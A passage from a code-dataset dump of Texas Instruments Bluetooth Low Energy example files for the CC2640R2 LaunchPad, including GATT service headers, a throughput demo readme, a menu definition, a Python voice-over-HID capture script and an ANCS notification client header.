*/\n/*!\n * @file Temperature_Service.h\n *\n * @brief Custom TI GATT service to read temperature sensor data.\n *\n * This service defines the following Characterisics:\n *\n * Characteristic Name | UUID | Length | Purpose\n * ------------------- | ------ | ------ | -------\n * Data | 0xAA01 | 4 | Object[0:7], Object[8:15], Ambience[0:7], Ambience[8:15]\n * Config | 0xAA02 | 1 | Write 0x01 to enable data collection, 0x00 to disable.\n * Period | 0xAA03 | 1 | Resolution 10 ms. Range 300 ms (0x1E) to 2.55 sec (0xFF). Default 1 second (0x64)\n */\n\n#ifndef _TEMPERATURE_SERVICE_H_\n#define _TEMPERATURE_SERVICE_H_\n\n#include \"bcomdef.h\"\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n/*********************************************************************\n * INCLUDES\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n/*********************************************************************\n * TYPEDEFS\n */\ntypedef struct Temperature_Service_Data_t\n{\n uint8_t objectLowByte;\n uint8_t objectHighByte;\n uint8_t ambienceLowByte;\n uint8_t ambienceHighByte;\n} Temperature_Service_Data;\n\n/*********************************************************************\n* CONSTANTS\n*/\n/*! UUID for the GATT Primary Service Declaration\n */\n#define TEMPERATURE_SERVICE_SERV_UUID 0xAA00\n\n// Characteristic defines\n#define TEMPERATURE_SERVICE_DATA 0\n#define TEMPERATURE_SERVICE_DATA_UUID 0xAA01\n#define TEMPERATURE_SERVICE_DATA_LEN sizeof(Temperature_Service_Data)\n\n// Characteristic defines\n#define TEMPERATURE_SERVICE_CONFIG 1\n#define TEMPERATURE_SERVICE_CONFIG_UUID 0xAA02\n#define TEMPERATURE_SERVICE_CONFIG_LEN 1\n\n// Characteristic defines\n#define TEMPERATURE_SERVICE_PERIOD 2\n#define TEMPERATURE_SERVICE_PERIOD_UUID 0xAA03\n#define TEMPERATURE_SERVICE_PERIOD_LEN 1\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * Profile Callbacks\n */\n\n/*!\n * Temperature_Service callback function prototype\n *\n * Callback occur when characteristic values have changed\n *\n * @param paramID Profile parameter ID\n */\ntypedef void (*Temperature_ServiceChange_t)( uint8 paramID );\n\n/*!\n * Data structure of callback functions.\n */\ntypedef struct\n{\n // Called when characteristic value changes\n Temperature_ServiceChange_t pfnChangeCb;\n} Temperature_ServiceCBs_t;\n\n\n\n/*********************************************************************\n * API FUNCTIONS\n */\n\n\n/*!\n * @brief Initialize the Temperature Service\n *\n * Initializes the Temperature_Service service by registering GATT attributes\n * with the GATT server.\n *\n * @return Generic Status Return values defined by bcomdef.h\n */\nextern bStatus_t Temperature_Service_AddService( void );\n\n/*!\n * @brief Registers the application callback function.\n *\n * @warn Only call this function once.\n *\n * @param appCallbacks Pointer to application callbacks.\n *\n * @return Generic Status Return values defined by bcomdef.h\n */\nextern bStatus_t Temperature_Service_RegisterAppCBs(\n Temperature_ServiceCBs_t *appCallbacks );\n\n/*!\n * @brief Set a Temperature_Service parameter.\n *\n * @param param Profile parameter ID\n *\n * @param len length of data to write\n *\n * @param value pointer to data to write. This is dependent on the\n * parameter ID and WILL be cast to the appropriate data type\n * (example: data type of uint16 will be cast to uint16\n * pointer).\n *\n * @return Generic Status Return values defined by bcomdef.h\n */\nextern bStatus_t Temperature_Service_SetParameter( uint8 param, uint8 len,\n void *value );\n\n/*\n * @brief Get a Temperature_Service parameter.\n *\n * @param param Profile parameter ID\n *\n * @param value pointer to data to write. This is dependent on the\n * parameter ID and WILL be cast to the appropriate data type\n * (example: data type of uint16 will be cast to uint16\n * pointer).\n *\n * @return Generic Status Return values defined by bcomdef.h\n */\nextern bStatus_t Temperature_Service_GetParameter( uint8 param, void *value );\n\n/*********************************************************************\n*********************************************************************/\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* _TEMPERATURE_SERVICE_H_ */\n"
},
{
"alpha_fraction": 0.564051628112793,
"alphanum_fraction": 0.5846573710441589,
"avg_line_length": 33.72413635253906,
"blob_id": "fae6b3b97058d15031173e3497620cac8f4c58ae",
"content_id": "6d232284273c7000f75a0b33d4928c2def7570a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4028,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 116,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_server/src/app/spp_ble_server.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file spp_ble_server.h\n\n @brief This file contains the Simple BLE Peripheral sample application\n definitions and prototypes.\n\n Group: WCS, BTS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2013-2016, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n ******************************************************************************\n Release Name: ti-ble-3.0-stack-sdk_3_00_00\n Release Date: 2016-12-21 12:44:47\n *****************************************************************************/\n\n#ifndef SIMPLEBLEPERIPHERAL_H\n#define SIMPLEBLEPERIPHERAL_H\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n/*********************************************************************\n* EXTERNAL VARIABLES\n*/\n\n/*********************************************************************\n * CONSTANTS\n */\n// External Events for RTOS application\n#define SBP_UART_DATA_EVT 0x0010\n#define SBP_UART_ERROR_EVT 0x0020\n\n//LED parameters\n#define Board_LED_TOGGLE 3\n#define BLINK_DURATION 1000 // Milliseconds\n\n /* Delay */\n#ifdef TI_DRIVERS_I2C_INCLUDED\n#define delay_ms(i) Task_sleep( ((i) * 1000) / Clock_tickPeriod )\n#define MS_2_TICKS(ms) ( ((ms) * 1000) / Clock_tickPeriod )\n#else\n#define delay_ms(i) ( CPUdelay(12000*(i)) )\n#endif\n/*********************************************************************\n * MACROS\n */\n#define DEBUG_SIMPLE\n\n#if !defined(DEBUG_SIMPLE)\n# define Display_print0(handle, line, col, fmt) DEBUG(fmt); \\\n DEBUG_NEWLINE()\n# define Display_print1(handle, line, col, fmt, a0) DEBUG((uint8 *)fmt); \\\n DEBUG((uint8_t*)convInt32ToText((int32)a0)); DEBUG_NEWLINE()\n#else\n# define Display_print0(handle, line, col, fmt)\n\n# define Display_print1(handle, line, col, fmt, a0)\n\n#endif\n/*********************************************************************\n * FUNCTIONS\n */\n\n/*\n * Task creation function for the Simple BLE Peripheral.\n */\nextern void SimpleBLEPeripheral_createTask(void);\nextern void SPPBLEServer_toggleLed(uint8_t led, uint8_t state);\nextern char* convInt32ToText(int32 value);\n\n/*********************************************************************\n*********************************************************************/\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* SIMPLEBLEPERIPHERAL_H */\n"
},
{
"alpha_fraction": 0.6860953569412231,
"alphanum_fraction": 0.7179550528526306,
"avg_line_length": 30.146154403686523,
"blob_id": "7149407e80423de74a160a3b842582f17f19209d",
"content_id": "bd1a1ce1f816b22f6b675aab6dbe10be466b5968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4049,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 130,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# BLE5-Stack Throughput Central\n\n## Functional Overview\n\nThis project is meant to be utilized with BLE5-Stack Throughput Peripheral to\ndemonstrate Bluetooth™ 5 features.\n\nThis project is based on the Simple Central sample application from the\nBLE5-Stack component of the SDK.\n\nBLE5-Stack Throughput Peripheral Project should be used in order to do a full\nthroughput demo. However, this project can function standalone to demonstrate\nthe Data Length Extension, 2 Megabit, or Coded PHYs when connected to a peer\ndevice supporting these features.\n\nThis list contains the changes from the standard Simple Central example:\n- Added Support for a custom profile called Throughput Profile\n- Modified existing menu system to utilize the Two Button Menu\n- Changed Service and Characteristic Discover Behavior\n- Changed MTU Size of project\n\n## Project Hardware\n- 1 CC2650R2 Launchpad\n- 1 UART Terminal on PC\n\n### Two Button Menu\n\nThe Two Button Menu system is designed to utilize the two push buttons available\non the CC2640R2 Launchpad. The left button (BTN1) is always used to cycle\nbetween options. The right button (BTN2) is used to activate the selected action\nor item.\n\nThe Two Button Menu is set up by default to utilize the back channel UART\npresent on the launchpad as it's display.\n\n### Running the Demo\n\n1. Compile and load the projects:\n - First build and load `ble5_throughput_central_cc2640r2lp_stack`\n - Next build and load `ble5_throughput_central_cc2640r2lp_app`\n\n1. Connect to the LaunchPad via PuTTY (or other serial console emulator). For\n instructions on connecting via PuTTY, please see our [FAQ page](faq.md).\n\n1. After connecting to PuTTY, you will be presented with the Two Button Menu\n system prompting you for actions. Select 'Scan/Connect Menu' by pressing the\n right button (BTN2).\n\n ```\n *Texas Instruments Bluetooth 5 Demo\n\n +Scan/Connect Menu >\n ```\n\n1. Then select \"Scan For Devices\" menu option by pressing the right button (BTN2).\n\n ```\n *Scan/Connect Menu\n < Next Item\n Scan for Devices >\n +Upper Menu\n ```\n\n1. After Scanning is Performed, choose the desired device to connect to by pressing\n the right button (BTN2). Note: If the peer device supports the Throughput Profile,\n below the peer device's address will contain the text:\n ``-- Throughput Profile Supported --``\n\n ```\n *Scan/Connect Menu\n < Next Item\n Select Next Device >\n Connect to Selected Device\n Scan for Devices\n +Upper Menu\n 2 Devices Found\n\n Scanned Device 1\n 0x98072DAA4E5E\n -- Throughput Profile Supported --\n ```\n\n1. Press the left button (BTN1) to move to the next action, \"Connect to\n Selected Device\". Then use the right button (BTN2) to begin connecting to\n the displayed device.\n\n After a connection is successful, you will be presented with new menu\n options:\n\n ```\n *Texas Instruments Bluetooth 5 Demo\n < Next Item\n +Set PHY >\n +Set PDU\n Toggle RSSI Readings\n Disconnect\n ```\n\n As well as connection details in the UART display:\n\n ```\n Peer Device : 0x98072DAA4E5E\n PHY: 1 Mbps\n Instant Rate (kb/s): 247.904\n Average Rate (kb/s): 264.104 over 10 Samples\n RSSI -dBm: 44\n ```\n\n As shown, if the Throughput Profile is supported on the peer, throughput information will be displayed.\n\n1. As desired, BLE5-Stack Throughput Central can modify the PHY and DLE PDU\n size of the connection. Use left button (BTN1) to change selected action,\n and right button (BTN2) to invoke the selected action. The display will\n update if connection PDU or PHY is changed.\n\n ```\n Peer Device : 0x98072DAA4E5E\n Current PHY: 2 Mbps\n Instant Rate (kb/s): 1366.400\n Average Rate (kb/s): 1366.400 over 10 Samples\n RSSI -dBm: 32\n\n This Device's BDADDR : 0x00124B005220\n Device GAP Role: Central\n Device RX PDU Size: 251B\n MTU Size: 247B\n ```\n\n If Throughput Profile is supported on the peer, the displayed throughput\n will update in real time.\n"
},
{
"alpha_fraction": 0.7129367589950562,
"alphanum_fraction": 0.7223796248435974,
"avg_line_length": 35.482757568359375,
"blob_id": "58ab363376fd344194994ecc77aa5ec05327d0a1",
"content_id": "37ef9efe91e63409d472ca3f7ac3600799b2d166",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1059,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 29,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/src/app/longrange_central_menu.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "#include <bcomdef.h>\n#include <ti/display/Display.h>\n\n#if defined(BLE_V50_FEATURES) && (BLE_V50_FEATURES & PHY_2MBPS_CFG) && !defined(Display_DISABLE_ALL)\n#include <menu/two_btn_menu.h>\n#include \"longrange_central_menu.h\"\n#include \"longrange_central.h\"\n\n/*\n * Menu Lists Initializations\n */\n\n/* Menu: Main\n 3 submenus, no actions, no upper */\nMENU_OBJ(sbcMenuMain, NULL, 3, NULL)\n MENU_ITEM_SUBMENU(&sbcMenuScanandConnect)\n MENU_ITEM_ACTION(\"Toggle RSSI Readings\", SimpleBLECentral_doToggleRSSI)\n MENU_ITEM_ACTION(\"Disconnect\", SimpleBLECentral_doDisconnect)\nMENU_OBJ_END\n\n/* Menu: Scanning and Connection\n 3 actions, upper = sbpMenuMain */\nMENU_OBJ(sbcMenuScanandConnect, \"Scan/Connect Menu\", 3, &sbcMenuMain)\n MENU_ITEM_ACTION(\"Select Next Device\", SimpleBLECentral_doScanAndConnect)\n MENU_ITEM_ACTION(\"Connect to Selected Device\", SimpleBLECentral_doScanAndConnect)\n MENU_ITEM_ACTION(\"Scan for Devices\", SimpleBLECentral_doScanAndConnect)\nMENU_OBJ_END\n\n#endif // PHY_2MBPS_CFG && !Display_DISABLE_ALL\n\n"
},
{
"alpha_fraction": 0.664284348487854,
"alphanum_fraction": 0.6706587076187134,
"avg_line_length": 33.744964599609375,
"blob_id": "d621bfd17dd2a2e567b0c0da92f59149962b6e2d",
"content_id": "d920a0d97d7457ddd9d7f3f798b1f28f423eb194",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5177,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 149,
"path": "/tools/scripts/voice/voice.py",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "\"\"\"\n/*\n * Filename: voice_hogp.py\n *\n * Description: Voice of HID over GATT sample script\n *\n * Copyright (C) 2017 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\"\"\"\n\n\nfrom transport.hidtransport import HIDLegacy, HIDVoHoGP\nfrom codec.adpcm import ADPCM\nimport logging\nimport argparse\nfrom time import sleep\nimport time\nimport wave\nimport sys\n\n\ndef set_debug_level(loggers, formatter):\n\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n\n for log in loggers:\n\n logger = logging.getLogger(log)\n\n if \"ADPCM\" in log:\n logger.setLevel(logging.CRITICAL)\n logger.setLevel(logging.ERROR)\n #logger.setLevel(logging.WARNING)\n #logger.setLevel(logging.INFO)\n #logger.setLevel(logging.DEBUG)\n\n if \"HIDLegacy\" in log:\n logger.setLevel(logging.CRITICAL)\n logger.setLevel(logging.ERROR)\n #logger.setLevel(logging.WARNING)\n logger.setLevel(logging.INFO)\n #logger.setLevel(logging.DEBUG)\n\n if \"HIDVoHoGP\" in log:\n logger.setLevel(logging.CRITICAL)\n logger.setLevel(logging.ERROR)\n logger.setLevel(logging.WARNING)\n logger.setLevel(logging.INFO)\n #logger.setLevel(logging.DEBUG)\n\n\n logger.addHandler(ch)\n\n\ndef main():\n\n \"\"\" Add argument parsing to the application \"\"\"\n parser = argparse.ArgumentParser(description=\"Voice test script\")\n parser.add_argument('--verbose', '-v', action='store_true', help=\"enable verbose output\")\n parser.add_argument('--transport_validation', action='store_true', help=\"enable transport level data validation; used for testing\")\n parser.add_argument('--transport', '-t', choices=[\"legacy\", \"vohogp\"], default=\"vohogp\", help=\"transport method used to get voice data\")\n\n args = vars(parser.parse_args())\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n if args[\"verbose\"]:\n set_debug_level([\"ADPCM\", \"HIDLegacy\", \"HIDVoHoGP\"], formatter)\n\n appLogger = logging.getLogger(\"APP\")\n appLogger.setLevel(logging.INFO)\n\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n appLogger.addHandler(ch)\n\n def testfunction(data):\n appLogger.info(\"Test Callback with %s bytes\" % len(data))\n codec = ADPCM()\n decoded = codec.decode(data)\n\n filename = time.strftime(\"pdm_test_%Y-%m-%d_%H-%M-%S_adpcm\")+\".wav\"\n w = wave.open(filename, \"w\")\n w.setnchannels(1)\n w.setframerate(16000)\n w.setsampwidth(2)\n w.writeframes(decoded)\n w.close()\n appLogger.info(\"Created %s\" % filename)\n\n if args[\"transport\"] is \"vohogp\":\n transport = HIDVoHoGP(testfunction, vendor_id=0x000d, product_id=0x0000)\n elif args[\"transport\"] is \"legacy\":\n transport = HIDLegacy(testfunction, vendor_id=0x000d, product_id=0x0000)\n else:\n raise \"Invalid transport selection\"\n\n transport.setDataValidation(args[\"transport_validation\"])\n\n print ('Starting script...\\n')\n sys.stdout.flush()\n\n if transport.open():\n print ('\\t1. Press and Hold MIC button')\n print ('\\t2. Speak into Microphone')\n print ('\\t3. Release MIC button to save data to file')\n sys.stdout.flush()\n\n while transport.isConnected():\n sleep(1)\n\n transport.close()\n else:\n print ('\\tUSB device is not connected or it does not have voice service.')\n print ('\\tMake sure the remote is connected.')\n print ('\\tAdd the \\\"-h\\\" option for help.')\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5832423567771912,
"alphanum_fraction": 0.5935669541358948,
"avg_line_length": 43.37445068359375,
"blob_id": "90dd4fc7fc30de872e9648337c6bba2aaa4f3d7b",
"content_id": "f60f778fcc8ed0aa7aefb04d0443f6c7e315513a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 10073,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 227,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/src/app/ancs.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file ancs.h\n\n @brief This file contains the ANCS Application sample application for use\n with the CC2640R2 Bluetooth Low Energy Protocol Stack.\n\n Group: CMCU, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2017-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *****************************************************************************/\n\n#ifndef ANCS_H\n#define ANCS_H\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n/*********************************************************************\n * INCLUDES\n */\n#include \"gatt.h\"\n/*********************************************************************\n * CONSTANTS\n */\n\n// ANCS discovery states.\nenum\n{\n ANCS_IDLE, // Initial idle state.\n ANCS_EXCHANGE_MTU, // Wait for the MTU exchange to take place.\n ANCS_DISC_SERVICE, // Discover the ANCS service by UUID.\n ANCS_STORE_SERVICE_HANDLES, // Store the ANCS service handles in the cache.\n ANCS_DISC_CHARS, // Discover the three characteristics: Notification Source, Control Point, and Data Source.\n ANCS_STORE_CHARS_HANDLES, // Store the handles of each characteristic in the handle cache.\n ANCS_DISC_NS_DESCS, // Discover the descriptors of the Notification Source (Trying to locate the CCCD).\n ANCS_STORE_NS_DESCS_HANDLES, // Store the descriptor's handles in the handle cache (ANCS_NOTIF_SCR_HDL_CCCD).\n ANCS_DISC_DS_DESCS, // Discover the descriptors of the Data Source (Trying to locate the CCCD).\n ANCS_STORE_DS_DESCS_HANDLES, // Store the descriptor's handles in the handle cache (ANCS_DATA_SRC_HDL_CCCD).\n ANCS_WRITE_DS_CCCD, // Perform a write to the Notification Source's CCCD to subscribe for notifications.\n ANCS_WRITE_NS_CCCD, // Perform a write to the Data Source's CCCD to subscribe for notifications.\n ANCS_DISC_FINISH, // Final state signifying the end of the discovery process.\n\n ANCS_DISC_FAILED = 0xFF // A failure state reached only if an error occurs.\n};\n\n// ANCS handle cache indices.\nenum\n{\n ANCS_NOTIF_SCR_HDL_START, // ANCS Notification Source characteristic start handle.\n ANCS_NOTIF_SCR_HDL_END, // ANCS Notification Source characteristic end handle.\n ANCS_NOTIF_SCR_HDL_CCCD, // ANCS Notification Source CCCD handle.\n\n ANCS_CTRL_POINT_HDL_START, // ANCS Control Point characteristic start handle.\n ANCS_CTRL_POINT_HDL_END, // ANCS Control Point characteristic end handle.\n\n ANCS_DATA_SRC_HDL_START, // ANCS Data Source characteristic start handle.\n ANCS_DATA_SRC_HDL_END, // ANCS Data Source characteristic end handle.\n ANCS_DATA_SRC_HDL_CCCD, // ANCS Data Source CCCD handle.\n};\n\n// Cache array length.\n#define HDL_CACHE_LEN 8\n\n// States for the notification attribute retrieval state machine (Ancs_handleNotifAttrRsp()).\nenum\n{\n NOTI_ATTR_ID_BEGIN, // ANCS notification attribute initial retrieval state.\n NOTI_ATTR_ID_APPID, // ANCS notification attribute AppID retrieval state.\n APP_ATTR_ID_DN, // ANCS application attribute display name retrieval state.\n NOTI_ATTR_ID_TITLE, // ANCS notification attribute Title retrieval state.\n NOTI_ATTR_ID_SUBTITLE, // ANCS notification attribute Subtitle retrieval state.\n NOTI_ATTR_ID_MESSAGE, // ANCS notification attribute Message retrieval state.\n NOTI_ATTR_ID_MESSAGE_SIZE, // ANCS notification attribute Message Size retrieval state.\n NOTI_ATTR_ID_DATE, // ANCS notification attribute Date retrieval state.\n NOTI_ATTR_ID_END // ANCS notification attribute final retrieval state.\n};\n\n// States for processing Data Source packets.\nenum\n{\n NOTI_ATTR_FIRST_PKT, // Initial retrieved Data Source packet processing state.\n NOTI_ATTR_CONTINUE_PKT, // Post-Initial retrieved Data Source packet processing state.\n};\n\n\n/*********************************************************************\n * MACROS\n */\n\n// Number of bytes required to store an ANCS notification UID\n#define ANCS_NOTIF_UID_LENGTH 4\n\n// CommandID Values\n#define COMMAND_ID_GET_NOTIFICATION_ATTRIBUTES 0x00\n#define COMMAND_ID_GET_APP_ATTRIBUTES 0x01\n#define COMMAND_ID_PERFORM_NOTIFICATION_ACTION 0x02\n\n#define ACTION_ID_POSITIVE 0\n#define ACTION_ID_NEGATIVE 1\n\n// Notification AttributeID Values\n#define NOTIFICATION_ATTRIBUTE_ID_APP_IDENTIFIER 0\n#define NOTIFICATION_ATTRIBUTE_ID_TITLE 1\n#define NOTIFICATION_ATTRIBUTE_ID_SUBTITLE 2\n#define NOTIFICATION_ATTRIBUTE_ID_MESSAGE 3\n#define NOTIFICATION_ATTRIBUTE_ID_MESSAGE_SIZE 4\n#define NOTIFICATION_ATTRIBUTE_ID_DATE 5\n#define NOTIFICATION_ATTRIBUTE_ID_POSITIVE_ACTION_LABEL 6\n#define NOTIFICATION_ATTRIBUTE_ID_NEGATIVE_ACTION_LABEL 7\n\n// EventID Values\n#define EVENT_ID_NOTIFICATION_ADDED 0\n#define EVENT_ID_NOTIFICATION_MODIFIED 1\n#define EVENT_ID_NOTIFICATION_REMOVED 2\n\n// EventFlags\n#define EVENT_FLAG_SILENT 0x01\n#define EVENT_FLAG_IMPORTANT 0x02\n#define EVENT_FLAG_PREEXISTING 0x04\n#define EVENT_FLAG_POSITIVE_ACTION 0x08\n#define EVENT_FLAG_NEGATIVE_ACTION 0x10\n\n// CategoryID Values\n#define CATEGORY_ID_OTHER 0\n#define CATEGORY_ID_INCOMING_CALL 1\n#define CATEGORY_ID_MISSED_CALL 2\n#define CATEGORY_ID_VOICEMAIL 3\n#define CATEGORY_ID_SOCIAL 4\n#define CATEGORY_ID_SCHEDULE 5\n#define CATEGORY_ID_EMAIL 6\n#define CATEGORY_ID_NEWS 7\n#define CATEGORY_ID_HEALTH_AND_FITNESS 8\n#define CATEGORY_ID_BUSINESS_AND_FINANCE 9\n#define CATEGORY_ID_LOCATION 10\n#define CATEGORY_ID_ENTERTAINMENT 11\n\n\n// Define ANCS Client Flags\n#define CLIENT_NONE 0x00\n#define CLIENT_IMPORTANT_ALERT 0x01\n#define CLIENT_POSITIVE_ACT 0x02\n#define CLIENT_NEG_ACT 0x04\n\n// Error Codes received from Control Point\n#define UNKNOWN_COMMAND 0xA0\n#define INVALID_COMMAND 0xA1\n#define INVALID_PARAMETER 0xA2\n#define ACTION_FAILED 0xA3\n\n// AppAttributeID values\n#define APP_ATTRIBUTE_ID_DISPLAY_NAME 0x00\n\n// ANCS Control Point action length.\n#define PERFORM_NOTIFICATION_ACTION_LENGTH 6\n\n/*********************************************************************\n * GLOBAL\n */\n// The iPhones Connection handle.\nextern uint16_t Ancs_connHandle;\n\n// The ANCS handle cache.\nextern uint16_t Ancs_handleCache[HDL_CACHE_LEN];\n\n// Stores Data Service notification processing state.\nextern uint8_t notifAttrPktProcessState;\n\n// Stores Data Service app attribute processing state\nextern uint8_t appAttrPktProcessState;\n/*********************************************************************\n * FUNCTIONS\n */\n\n// ANCS service discovery functions.\nextern uint8_t Ancs_subsNotifSrc(void);\nextern uint8_t Ancs_subsDataSrc(void);\n\n// ANCS notification handling function.\nextern void Ancs_processDataServiceNotif(gattMsgEvent_t *pMsg);\nextern void Ancs_queueNewNotif(gattMsgEvent_t *pMsg);\nextern void Ancs_popAllNotifsFromQueue(void);\nextern void Ancs_acceptIncomingCall(void);\nextern void Ancs_declineIncomingCall(void);\n\n\n/*********************************************************************\n *********************************************************************/\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ANCS_H */\n"
},
{
"alpha_fraction": 0.6067489981651306,
"alphanum_fraction": 0.6199301481246948,
"avg_line_length": 33.71276092529297,
"blob_id": "ed9b3d36eada1c87c195c6ac5cf48450f3228d79",
"content_id": "951be183662097b76bc37813db399b486eaef4b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 65017,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 1873,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/src/app/ancs_app.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
